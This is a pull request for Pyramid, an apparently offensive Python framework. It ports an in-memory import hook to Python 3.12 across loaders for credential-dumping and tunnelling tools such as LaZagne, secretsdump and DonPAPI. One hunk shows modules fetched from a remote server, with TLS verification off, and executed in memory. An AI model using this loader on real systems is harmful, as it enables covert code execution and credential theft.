### PR TITLE
Support for Python 3.12

### DIFF
--- a/Server/Modules/DonPAPI.py
+++ b/Server/Modules/DonPAPI.py
@@ -224,7 +224,7 @@ class CFinder(object):
 		self.repoName = repoName
 		self._source_cache = {}
 
-	def _get_info(self, repoName, fullname):
+	def _get_info(self, fullname):
 		"""Search for the respective package or module in the zipfile object"""
 		parts = fullname.split('.')
 		submodule = parts[-1]
@@ -235,26 +235,26 @@ class CFinder(object):
 		for suffix, is_package in _search_order:
 			relpath = modulepath + suffix
 			try:
-				moduleRepo[repoName].getinfo(relpath)
+				moduleRepo[self.repoName].getinfo(relpath)
 			except KeyError:
 				pass
 			else:
 				return submodule, is_package, relpath
 
 		#Error out if we can find the module/package
-		msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
+		msg = ('Unable to locate module %s in the %s repo' % (submodule, self.repoName))
 		raise ZipImportError(msg)
 
-	def _get_source(self, repoName, fullname):
+	def _get_source(self, fullname):
 		"""Get the source code for the requested module"""
-		submodule, is_package, relpath = self._get_info(repoName, fullname)
-		fullpath = '%s/%s' % (repoName, relpath)
+		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		fullpath = '%s/%s' % (self.repoName, relpath)
 		if relpath in self._source_cache:
 			source = self._source_cache[relpath]
 			return submodule, is_package, fullpath, source
 		try:
 			### added .decode
-			source =  moduleRepo[repoName].read(relpath).decode()
+			source =  moduleRepo[self.repoName].read(relpath).decode()
 			#print(source)
 			source = source.replace('\r\n', '\n')
 			source = source.replace('\r', '\n')
@@ -263,27 +263,23 @@ class CFinder(object):
 		except:
 			raise ZipImportError("Unable to obtain source for module %s" % (fullpath))
 
-	def find_module(self, fullname, path=None):
-
+	def find_spec(self, fullname, path=None, target=None):
 		try:
-			submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+			submodule, is_package, relpath = self._get_info(fullname)
 		except ImportError:
 			return None
 		else:
-			return self
+			return importlib.util.spec_from_loader(fullname, self)
 
-	def load_module(self, fullname):
-		submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+	def create_module(self, spec):
+		return None
+
+	def exec_module(self, module):
+		submodule, is_package, fullpath, source = self._get_source(module.__name__)
 		code = compile(source, fullpath, 'exec')
-		spec = importlib.util.spec_from_loader(fullname, loader=None)
-		mod = sys.modules.setdefault(fullname, importlib.util.module_from_spec(spec))
-		mod.__loader__ = self
-		mod.__file__ = fullpath
-		mod.__name__ = fullname
 		if is_package:
-			mod.__path__ = [os.path.dirname(mod.__file__)]
-		exec(code,mod.__dict__)
-		return mod
+			module.__path__ = [os.path.dirname(fullpath)]
+		exec(code, module.__dict__)
 
 	def get_data(self, fullpath):
 

--- a/Server/Modules/DonPAPI.py
+++ b/Server/Modules/DonPAPI.py
@@ -247,7 +247,7 @@ class CFinder(object):
 
 	def _get_source(self, fullname):
 		"""Get the source code for the requested module"""
-		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		submodule, is_package, relpath = self._get_info(fullname)
 		fullpath = '%s/%s' % (self.repoName, relpath)
 		if relpath in self._source_cache:
 			source = self._source_cache[relpath]
@@ -294,11 +294,11 @@ class CFinder(object):
 
 	def is_package(self, fullname):
 		"""Return if the module is a package"""
-		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		submodule, is_package, relpath = self._get_info(fullname)
 		return is_package
 
 	def get_code(self, fullname):
-		submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+		submodule, is_package, fullpath, source = self._get_source(fullname)
 		return compile(source, fullpath, 'exec')
 
 def install_hook(repoName):

--- a/Server/Modules/LaZagne.py
+++ b/Server/Modules/LaZagne.py
@@ -252,7 +252,7 @@ class CFinder(object):
 
 	def _get_source(self, fullname):
 		"""Get the source code for the requested module"""
-		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		submodule, is_package, relpath = self._get_info(fullname)
 		fullpath = '%s/%s' % (self.repoName, relpath)
 		if relpath in self._source_cache:
 			source = self._source_cache[relpath]
@@ -299,11 +299,11 @@ class CFinder(object):
 
 	def is_package(self, fullname):
 		"""Return if the module is a package"""
-		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		submodule, is_package, relpath = self._get_info(fullname)
 		return is_package
 
 	def get_code(self, fullname):
-		submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+		submodule, is_package, fullpath, source = self._get_source(fullname)
 		return compile(source, fullpath, 'exec')
 
 def install_hook(repoName):

--- a/Server/Modules/LaZagne.py
+++ b/Server/Modules/LaZagne.py
@@ -229,7 +229,7 @@ class CFinder(object):
 		self.repoName = repoName
 		self._source_cache = {}
 
-	def _get_info(self, repoName, fullname):
+	def _get_info(self, fullname):
 		"""Search for the respective package or module in the zipfile object"""
 		parts = fullname.split('.')
 		submodule = parts[-1]
@@ -240,26 +240,26 @@ class CFinder(object):
 		for suffix, is_package in _search_order:
 			relpath = modulepath + suffix
 			try:
-				moduleRepo[repoName].getinfo(relpath)
+				moduleRepo[self.repoName].getinfo(relpath)
 			except KeyError:
 				pass
 			else:
 				return submodule, is_package, relpath
 
 		#Error out if we can find the module/package
-		msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
+		msg = ('Unable to locate module %s in the %s repo' % (submodule, self.repoName))
 		raise ZipImportError(msg)
 
-	def _get_source(self, repoName, fullname):
+	def _get_source(self, fullname):
 		"""Get the source code for the requested module"""
-		submodule, is_package, relpath = self._get_info(repoName, fullname)
-		fullpath = '%s/%s' % (repoName, relpath)
+		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		fullpath = '%s/%s' % (self.repoName, relpath)
 		if relpath in self._source_cache:
 			source = self._source_cache[relpath]
 			return submodule, is_package, fullpath, source
 		try:
 			### added .decode
-			source =  moduleRepo[repoName].read(relpath).decode()
+			source =  moduleRepo[self.repoName].read(relpath).decode()
 			#print(source)
 			source = source.replace('\r\n', '\n')
 			source = source.replace('\r', '\n')
@@ -268,27 +268,23 @@ class CFinder(object):
 		except:
 			raise ZipImportError("Unable to obtain source for module %s" % (fullpath))
 
-	def find_module(self, fullname, path=None):
-
+	def find_spec(self, fullname, path=None, target=None):
 		try:
-			submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+			submodule, is_package, relpath = self._get_info(fullname)
 		except ImportError:
 			return None
 		else:
-			return self
+			return importlib.util.spec_from_loader(fullname, self)
 
-	def load_module(self, fullname):
-		submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+	def create_module(self, spec):
+		return None
+
+	def exec_module(self, module):
+		submodule, is_package, fullpath, source = self._get_source(module.__name__)
 		code = compile(source, fullpath, 'exec')
-		spec = importlib.util.spec_from_loader(fullname, loader=None)
-		mod = sys.modules.setdefault(fullname, importlib.util.module_from_spec(spec))
-		mod.__loader__ = self
-		mod.__file__ = fullpath
-		mod.__name__ = fullname
 		if is_package:
-			mod.__path__ = [os.path.dirname(mod.__file__)]
-		exec(code,mod.__dict__)
-		return mod
+			module.__path__ = [os.path.dirname(fullpath)]
+		exec(code, module.__dict__)
 
 	def get_data(self, fullpath):
 

--- a/Server/Modules/bh.py
+++ b/Server/Modules/bh.py
@@ -241,7 +241,7 @@ class CFinder(object):
 
 	def _get_source(self, fullname):
 		"""Get the source code for the requested module"""
-		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		submodule, is_package, relpath = self._get_info(fullname)
 		fullpath = '%s/%s' % (self.repoName, relpath)
 		if relpath in self._source_cache:
 			source = self._source_cache[relpath]
@@ -288,11 +288,11 @@ class CFinder(object):
 
 	def is_package(self, fullname):
 		"""Return if the module is a package"""
-		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		submodule, is_package, relpath = self._get_info(fullname)
 		return is_package
 
 	def get_code(self, fullname):
-		submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+		submodule, is_package, fullpath, source = self._get_source(fullname)
 		return compile(source, fullpath, 'exec')
 
 def install_hook(repoName):

--- a/Server/Modules/clr.py
+++ b/Server/Modules/clr.py
@@ -244,7 +244,7 @@ class CFinder(object):
 
 	def _get_source(self, fullname):
 		"""Get the source code for the requested module"""
-		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		submodule, is_package, relpath = self._get_info(fullname)
 		fullpath = '%s/%s' % (self.repoName, relpath)
 		if relpath in self._source_cache:
 			source = self._source_cache[relpath]
@@ -290,11 +290,11 @@ class CFinder(object):
 
 	def is_package(self, fullname):
 		"""Return if the module is a package"""
-		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		submodule, is_package, relpath = self._get_info(fullname)
 		return is_package
 
 	def get_code(self, fullname):
-		submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+		submodule, is_package, fullpath, source = self._get_source(fullname)
 		return compile(source, fullpath, 'exec')
 
 def install_hook(repoName):

--- a/Server/Modules/clr.py
+++ b/Server/Modules/clr.py
@@ -221,7 +221,7 @@ class CFinder(object):
 		self.repoName = repoName
 		self._source_cache = {}
 
-	def _get_info(self, repoName, fullname):
+	def _get_info(self, fullname):
 		"""Search for the respective package or module in the zipfile object"""
 		parts = fullname.split('.')
 		submodule = parts[-1]
@@ -232,26 +232,26 @@ class CFinder(object):
 		for suffix, is_package in _search_order:
 			relpath = modulepath + suffix
 			try:
-				moduleRepo[repoName].getinfo(relpath)
+				moduleRepo[self.repoName].getinfo(relpath)
 			except KeyError:
 				pass
 			else:
 				return submodule, is_package, relpath
 
 		#Error out if we can find the module/package
-		msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
+		msg = ('Unable to locate module %s in the %s repo' % (submodule, self.repoName))
 		raise ZipImportError(msg)
 
-	def _get_source(self, repoName, fullname):
+	def _get_source(self, fullname):
 		"""Get the source code for the requested module"""
-		submodule, is_package, relpath = self._get_info(repoName, fullname)
-		fullpath = '%s/%s' % (repoName, relpath)
+		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		fullpath = '%s/%s' % (self.repoName, relpath)
 		if relpath in self._source_cache:
 			source = self._source_cache[relpath]
 			return submodule, is_package, fullpath, source
 		try:
 			### added .decode
-			source =  moduleRepo[repoName].read(relpath).decode()
+			source =  moduleRepo[self.repoName].read(relpath).decode()
 			#print(source)
 			source = source.replace('\r\n', '\n')
 			source = source.replace('\r', '\n')
@@ -260,26 +260,23 @@ class CFinder(object):
 		except:
 			raise ZipImportError("Unable to obtain source for module %s" % (fullpath))
 
-	def find_module(self, fullname, path=None):
+	def find_spec(self, fullname, path=None, target=None):
 		try:
-			submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+			submodule, is_package, relpath = self._get_info(fullname)
 		except ImportError:
 			return None
 		else:
-			return self
+			return importlib.util.spec_from_loader(fullname, self)
 
-	def load_module(self, fullname):
-		submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+	def create_module(self, spec):
+		return None
+
+	def exec_module(self, module):
+		submodule, is_package, fullpath, source = self._get_source(module.__name__)
 		code = compile(source, fullpath, 'exec')
-		spec = importlib.util.spec_from_loader(fullname, loader=None)
-		mod = sys.modules.setdefault(fullname, importlib.util.module_from_spec(spec))
-		mod.__loader__ = self
-		mod.__file__ = fullpath
-		mod.__name__ = fullname
 		if is_package:
-			mod.__path__ = [os.path.dirname(mod.__file__)]
-		exec(code,mod.__dict__)
-		return mod
+			module.__path__ = [os.path.dirname(fullpath)]
+		exec(code, module.__dict__)
 
 	def get_data(self, fullpath):
 		prefix = os.path.join(self.repoName, '')

--- a/Server/Modules/moduleshifting.py
+++ b/Server/Modules/moduleshifting.py
@@ -212,7 +212,7 @@ class CFinder(object):
 
     def _get_source(self, fullname):
         """Get the source code for the requested module"""
-        submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+        submodule, is_package, relpath = self._get_info(fullname)
         fullpath = '%s/%s' % (self.repoName, relpath)
         if relpath in self._source_cache:
             source = self._source_cache[relpath]
@@ -259,11 +259,11 @@ class CFinder(object):
 
     def is_package(self, fullname):
         """Return if the module is a package"""
-        submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+        submodule, is_package, relpath = self._get_info(fullname)
         return is_package
 
     def get_code(self, fullname):
-        submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+        submodule, is_package, fullpath, source = self._get_source(fullname)
         return compile(source, fullpath, 'exec')
 
 def install_hook(repoName):

--- a/Server/Modules/moduleshifting.py
+++ b/Server/Modules/moduleshifting.py
@@ -189,7 +189,7 @@ class CFinder(object):
         self.repoName = repoName
         self._source_cache = {}
 
-    def _get_info(self, repoName, fullname):
+    def _get_info(self, fullname):
         """Search for the respective package or module in the zipfile object"""
         parts = fullname.split('.')
         submodule = parts[-1]
@@ -200,26 +200,26 @@ class CFinder(object):
         for suffix, is_package in _search_order:
             relpath = modulepath + suffix
             try:
-                moduleRepo[repoName].getinfo(relpath)
+                moduleRepo[self.repoName].getinfo(relpath)
             except KeyError:
                 pass
             else:
                 return submodule, is_package, relpath
 
         #Error out if we can find the module/package
-        msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
+        msg = ('Unable to locate module %s in the %s repo' % (submodule, self.repoName))
         raise ZipImportError(msg)
 
-    def _get_source(self, repoName, fullname):
+    def _get_source(self, fullname):
         """Get the source code for the requested module"""
-        submodule, is_package, relpath = self._get_info(repoName, fullname)
-        fullpath = '%s/%s' % (repoName, relpath)
+        submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+        fullpath = '%s/%s' % (self.repoName, relpath)
         if relpath in self._source_cache:
             source = self._source_cache[relpath]
             return submodule, is_package, fullpath, source
         try:
             ### added .decode
-            source =  moduleRepo[repoName].read(relpath).decode()
+            source =  moduleRepo[self.repoName].read(relpath).decode()
             #print(source)
             source = source.replace('\r\n', '\n')
             source = source.replace('\r', '\n')
@@ -228,27 +228,23 @@ class CFinder(object):
         except:
             raise ZipImportError("Unable to obtain source for module %s" % (fullpath))
 
-    def find_module(self, fullname, path=None):
-
+    def find_spec(self, fullname, path=None, target=None):
         try:
-            submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+            submodule, is_package, relpath = self._get_info(fullname)
         except ImportError:
             return None
         else:
-            return self
+            return importlib.util.spec_from_loader(fullname, self)
 
-    def load_module(self, fullname):
-        submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+    def create_module(self, spec):
+        return None
+
+    def exec_module(self, module):
+        submodule, is_package, fullpath, source = self._get_source(module.__name__)
         code = compile(source, fullpath, 'exec')
-        spec = importlib.util.spec_from_loader(fullname, loader=None)
-        mod = sys.modules.setdefault(fullname, importlib.util.module_from_spec(spec))
-        mod.__loader__ = self
-        mod.__file__ = fullpath
-        mod.__name__ = fullname
         if is_package:
-            mod.__path__ = [os.path.dirname(mod.__file__)]
-        exec(code,mod.__dict__)
-        return mod
+            module.__path__ = [os.path.dirname(fullpath)]
+        exec(code, module.__dict__)
 
     def get_data(self, fullpath):
 

--- a/Server/Modules/pythonmemorymodule.py
+++ b/Server/Modules/pythonmemorymodule.py
@@ -196,7 +196,7 @@ class CFinder(object):
         self.repoName = repoName
         self._source_cache = {}
 
-    def _get_info(self, repoName, fullname):
+    def _get_info(self, fullname):
         """Search for the respective package or module in the zipfile object"""
         parts = fullname.split('.')
         submodule = parts[-1]
@@ -207,26 +207,26 @@ class CFinder(object):
         for suffix, is_package in _search_order:
             relpath = modulepath + suffix
             try:
-                moduleRepo[repoName].getinfo(relpath)
+                moduleRepo[self.repoName].getinfo(relpath)
             except KeyError:
                 pass
             else:
                 return submodule, is_package, relpath
 
         #Error out if we can find the module/package
-        msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
+        msg = ('Unable to locate module %s in the %s repo' % (submodule, self.repoName))
         raise ZipImportError(msg)
 
-    def _get_source(self, repoName, fullname):
+    def _get_source(self, fullname):
         """Get the source code for the requested module"""
-        submodule, is_package, relpath = self._get_info(repoName, fullname)
-        fullpath = '%s/%s' % (repoName, relpath)
+        submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+        fullpath = '%s/%s' % (self.repoName, relpath)
         if relpath in self._source_cache:
             source = self._source_cache[relpath]
             return submodule, is_package, fullpath, source
         try:
             ### added .decode
-            source =  moduleRepo[repoName].read(relpath).decode()
+            source =  moduleRepo[self.repoName].read(relpath).decode()
             #print(source)
             source = source.replace('\r\n', '\n')
             source = source.replace('\r', '\n')
@@ -235,27 +235,23 @@ class CFinder(object):
         except:
             raise ZipImportError("Unable to obtain source for module %s" % (fullpath))
 
-    def find_module(self, fullname, path=None):
-
+    def find_spec(self, fullname, path=None, target=None):
         try:
-            submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+            submodule, is_package, relpath = self._get_info(fullname)
         except ImportError:
             return None
         else:
-            return self
+            return importlib.util.spec_from_loader(fullname, self)
 
-    def load_module(self, fullname):
-        submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+    def create_module(self, spec):
+        return None
+
+    def exec_module(self, module):
+        submodule, is_package, fullpath, source = self._get_source(module.__name__)
         code = compile(source, fullpath, 'exec')
-        spec = importlib.util.spec_from_loader(fullname, loader=None)
-        mod = sys.modules.setdefault(fullname, importlib.util.module_from_spec(spec))
-        mod.__loader__ = self
-        mod.__file__ = fullpath
-        mod.__name__ = fullname
         if is_package:
-            mod.__path__ = [os.path.dirname(mod.__file__)]
-        exec(code,mod.__dict__)
-        return mod
+            module.__path__ = [os.path.dirname(fullpath)]
+        exec(code, module.__dict__)
 
     def get_data(self, fullpath):
 
@@ -310,7 +306,7 @@ for zip_name in zip_list:
         gcontext.verify_mode = ssl.CERT_NONE
         request = urllib.request.Request(pyramid_http + '://'+ pyramid_server + ':' + pyramid_port + encode_encrypt_url + \
                   base64.b64encode((encrypt_wrapper((zip_name+'.zip').encode(), encryption))).decode('utf-8'), \
-				  headers={'User-Agent': user_agent})
+                  headers={'User-Agent': user_agent})
         base64string = base64.b64encode(bytes('%s:%s' % (pyramid_user, pyramid_pass),'ascii'))
         request.add_header("Authorization", "Basic %s" % base64string.decode('utf-8'))
         with urllib.request.urlopen(request, context=gcontext) as response:
@@ -327,8 +323,8 @@ print("[*] Modules imported")
 cwd=os.getcwd()
 
 if not extraction_dir:
-	extraction_dir=cwd
-	
+    extraction_dir=cwd
+    
 sys.path.insert(1,extraction_dir)
 
 ### separator --- is used by Pyramid server to look into the specified folder

--- a/Server/Modules/pythonmemorymodule.py
+++ b/Server/Modules/pythonmemorymodule.py
@@ -219,7 +219,7 @@ class CFinder(object):
 
     def _get_source(self, fullname):
         """Get the source code for the requested module"""
-        submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+        submodule, is_package, relpath = self._get_info(fullname)
         fullpath = '%s/%s' % (self.repoName, relpath)
         if relpath in self._source_cache:
             source = self._source_cache[relpath]
@@ -266,11 +266,11 @@ class CFinder(object):
 
     def is_package(self, fullname):
         """Return if the module is a package"""
-        submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+        submodule, is_package, relpath = self._get_info(fullname)
         return is_package
 
     def get_code(self, fullname):
-        submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+        submodule, is_package, fullpath, source = self._get_source(fullname)
         return compile(source, fullpath, 'exec')
 
 def install_hook(repoName):

--- a/Server/Modules/secretsdump.py
+++ b/Server/Modules/secretsdump.py
@@ -216,7 +216,7 @@ class CFinder(object):
 		self.repoName = repoName
 		self._source_cache = {}
 
-	def _get_info(self, repoName, fullname):
+	def _get_info(self, fullname):
 		"""Search for the respective package or module in the zipfile object"""
 		parts = fullname.split('.')
 		submodule = parts[-1]
@@ -227,26 +227,26 @@ class CFinder(object):
 		for suffix, is_package in _search_order:
 			relpath = modulepath + suffix
 			try:
-				moduleRepo[repoName].getinfo(relpath)
+				moduleRepo[self.repoName].getinfo(relpath)
 			except KeyError:
 				pass
 			else:
 				return submodule, is_package, relpath
 
 		#Error out if we can find the module/package
-		msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
+		msg = ('Unable to locate module %s in the %s repo' % (submodule, self.repoName))
 		raise ZipImportError(msg)
 
-	def _get_source(self, repoName, fullname):
+	def _get_source(self, fullname):
 		"""Get the source code for the requested module"""
-		submodule, is_package, relpath = self._get_info(repoName, fullname)
-		fullpath = '%s/%s' % (repoName, relpath)
+		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		fullpath = '%s/%s' % (self.repoName, relpath)
 		if relpath in self._source_cache:
 			source = self._source_cache[relpath]
 			return submodule, is_package, fullpath, source
 		try:
 			### added .decode
-			source =  moduleRepo[repoName].read(relpath).decode()
+			source =  moduleRepo[self.repoName].read(relpath).decode()
 			#print(source)
 			source = source.replace('\r\n', '\n')
 			source = source.replace('\r', '\n')
@@ -255,27 +255,23 @@ class CFinder(object):
 		except:
 			raise ZipImportError("Unable to obtain source for module %s" % (fullpath))
 
-	def find_module(self, fullname, path=None):
-
+	def find_spec(self, fullname, path=None, target=None):
 		try:
-			submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+			submodule, is_package, relpath = self._get_info(fullname)
 		except ImportError:
 			return None
 		else:
-			return self
+			return importlib.util.spec_from_loader(fullname, self)
 
-	def load_module(self, fullname):
-		submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+	def create_module(self, spec):
+		return None
+
+	def exec_module(self, module):
+		submodule, is_package, fullpath, source = self._get_source(module.__name__)
 		code = compile(source, fullpath, 'exec')
-		spec = importlib.util.spec_from_loader(fullname, loader=None)
-		mod = sys.modules.setdefault(fullname, importlib.util.module_from_spec(spec))
-		mod.__loader__ = self
-		mod.__file__ = fullpath
-		mod.__name__ = fullname
 		if is_package:
-			mod.__path__ = [os.path.dirname(mod.__file__)]
-		exec(code,mod.__dict__)
-		return mod
+			module.__path__ = [os.path.dirname(fullpath)]
+		exec(code, module.__dict__)
 
 	def get_data(self, fullpath):
 

--- a/Server/Modules/secretsdump.py
+++ b/Server/Modules/secretsdump.py
@@ -239,7 +239,7 @@ class CFinder(object):
 
 	def _get_source(self, fullname):
 		"""Get the source code for the requested module"""
-		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		submodule, is_package, relpath = self._get_info(fullname)
 		fullpath = '%s/%s' % (self.repoName, relpath)
 		if relpath in self._source_cache:
 			source = self._source_cache[relpath]
@@ -286,11 +286,11 @@ class CFinder(object):
 
 	def is_package(self, fullname):
 		"""Return if the module is a package"""
-		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		submodule, is_package, relpath = self._get_info(fullname)
 		return is_package
 
 	def get_code(self, fullname):
-		submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+		submodule, is_package, fullpath, source = self._get_source(fullname)
 		return compile(source, fullpath, 'exec')
 
 def install_hook(repoName):

--- a/Server/Modules/tunnel-socks5.py
+++ b/Server/Modules/tunnel-socks5.py
@@ -224,37 +224,37 @@ class CFinder(object):
 		self.repoName = repoName
 		self._source_cache = {}
 
-	def _get_info(self, repoName, fullname):
+	def _get_info(self, fullname):
 		"""Search for the respective package or module in the zipfile object"""
 		parts = fullname.split('.')
 		submodule = parts[-1]
 		modulepath = '/'.join(parts)
+
 		#check to see if that specific module exists
 
 		for suffix, is_package in _search_order:
 			relpath = modulepath + suffix
 			try:
-				moduleRepo[repoName].getinfo(relpath)
+				moduleRepo[self.repoName].getinfo(relpath)
 			except KeyError:
 				pass
 			else:
 				return submodule, is_package, relpath
 
 		#Error out if we can find the module/package
-		msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
+		msg = ('Unable to locate module %s in the %s repo' % (submodule, self.repoName))
 		raise ZipImportError(msg)
 
-
-	def _get_source(self, repoName, fullname):
+	def _get_source(self, fullname):
 		"""Get the source code for the requested module"""
-		submodule, is_package, relpath = self._get_info(repoName, fullname)
-		fullpath = '%s/%s' % (repoName, relpath)
+		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		fullpath = '%s/%s' % (self.repoName, relpath)
 		if relpath in self._source_cache:
 			source = self._source_cache[relpath]
 			return submodule, is_package, fullpath, source
 		try:
 			### added .decode
-			source =  moduleRepo[repoName].read(relpath).decode()
+			source =  moduleRepo[self.repoName].read(relpath).decode()
 			#print(source)
 			source = source.replace('\r\n', '\n')
 			source = source.replace('\r', '\n')
@@ -263,28 +263,23 @@ class CFinder(object):
 		except:
 			raise ZipImportError("Unable to obtain source for module %s" % (fullpath))
 
-
-
-	def find_module(self, fullname, path=None):
+	def find_spec(self, fullname, path=None, target=None):
 		try:
-			submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+			submodule, is_package, relpath = self._get_info(fullname)
 		except ImportError:
 			return None
 		else:
-			return self
+			return importlib.util.spec_from_loader(fullname, self)
 
-	def load_module(self, fullname):
-		submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+	def create_module(self, spec):
+		return None
+
+	def exec_module(self, module):
+		submodule, is_package, fullpath, source = self._get_source(module.__name__)
 		code = compile(source, fullpath, 'exec')
-		spec = importlib.util.spec_from_loader(fullname, loader=None)
-		mod = sys.modules.setdefault(fullname, importlib.util.module_from_spec(spec))
-		mod.__loader__ = self
-		mod.__file__ = fullpath
-		mod.__name__ = fullname
 		if is_package:
-			mod.__path__ = [os.path.dirname(mod.__file__)]
-		exec(code,mod.__dict__)
-		return mod
+			module.__path__ = [os.path.dirname(fullpath)]
+		exec(code, module.__dict__)
 
 	def get_data(self, fullpath):
 		prefix = os.path.join(self.repoName, '')

--- a/Server/Modules/tunnel-socks5.py
+++ b/Server/Modules/tunnel-socks5.py
@@ -247,7 +247,7 @@ class CFinder(object):
 
 	def _get_source(self, fullname):
 		"""Get the source code for the requested module"""
-		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		submodule, is_package, relpath = self._get_info(fullname)
 		fullpath = '%s/%s' % (self.repoName, relpath)
 		if relpath in self._source_cache:
 			source = self._source_cache[relpath]
@@ -293,11 +293,11 @@ class CFinder(object):
 
 	def is_package(self, fullname):
 		"""Return if the module is a package"""
-		submodule, is_package, relpath = self._get_info(self.repoName, fullname)
+		submodule, is_package, relpath = self._get_info(fullname)
 		return is_package
 
 	def get_code(self, fullname):
-		submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
+		submodule, is_package, fullpath, source = self._get_source(fullname)
 		return compile(source, fullpath, 'exec')
 
 def install_hook(repoName):


### PR DESCRIPTION
While debugging, I realized Pyramid no longer works starting from Python 3.12 as find_module has been deprecated [1]. Support for Python 3.12 is quite important to build offensive killchains, as it is the only version you can download from the Microsoft App Store that does not require Admin privileges [2]

Instead, I reimplemented the CFinder class with its recommended alternative, find_spec, this should also enable backwards compatibility

[1]: https://docs.python.org/3/whatsnew/3.12.html
[2]: https://github.com/microsoft/winget-cli/issues/3285